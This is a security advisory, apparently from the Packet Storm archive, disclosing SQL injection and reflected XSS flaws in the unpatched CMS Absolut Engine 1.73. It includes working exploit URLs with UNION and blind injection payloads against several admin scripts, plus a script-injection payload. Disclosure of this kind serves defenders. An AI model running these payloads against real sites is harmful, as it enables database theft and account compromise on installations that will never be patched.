exploit the possibilities

Absolut Engine 1.73 Cross Site Scripting / SQL Injection

Absolut Engine 1.73 Cross Site Scripting / SQL Injection
Posted Dec 31, 2014
Authored by Steffen Roesemann

CMS Absolute Engine version 1.73 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 5530d741598ceedde7cc2793632e3839

Absolut Engine 1.73 Cross Site Scripting / SQL Injection

Change Mirror Download
Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.
1.73 CMS

Advisory ID: SROEADV-2014-08

Author: Steffen Rösemann

Affected Software: CMS Absolut Engine v. 1.73

Vendor URL: http://www.absolutengine.com/

Vendor Status: solved

CVE-ID: -


==========================

Vulnerability Description:

==========================


The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL
injection vulnerabilities and a XSS vulnerability in its administrative
backend.


==================

Technical Details:

==================


The following PHP-Scripts are prone to SQL injections:


*managersection.php (via sectionID parameter):*



*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1*


*Exploit Example:*



*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+*


*edituser.php (via userID parameter):*



*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3*


*Exploit Example:*



*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+*



*admin.php (via username parameter, BlindSQLInjection):*



*http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*


*Exploit Example:*



*http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*


*managerrelated.php (via title parameter):*


*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title
<http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}*


*Exploit Example:*



*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+*


The last PHP-Script is as well vulnerable to a Reflecting XSS
vulnerability.


*Exploit Example:*



*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E*


Although this is a product which is not actively developed anymore, I
think it is worth mentioning as the idea (of the lists) are to keep
tracking (unknown) vulnerabilities in software products (but that is a
personally point of view).


Moreover, this product is still in use by some sites (!) and it is offered
without a hint of its status.


=========

Solution:

=========


As the CMS is not actively developed, it shouldn't be used anymore.


====================

Disclosure Timeline:

====================

29-Dec-2014 – found the vulnerability

29-Dec-2014 - informed the developers

29-Dec-2014 – release date of this security advisory [without technical
details]

30-Dec-2014 – Vendor responded, won't patch vulnerabilities

30-Dec-2014 – release date of this security advisory

30-Dec-2014 – post on FullDisclosure



========

Credits:

========


Vulnerability found and advisory written by Steffen Rösemann.


===========

References:

===========


http://www.absolutengine.com/

http://sroesemann.blogspot.de


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close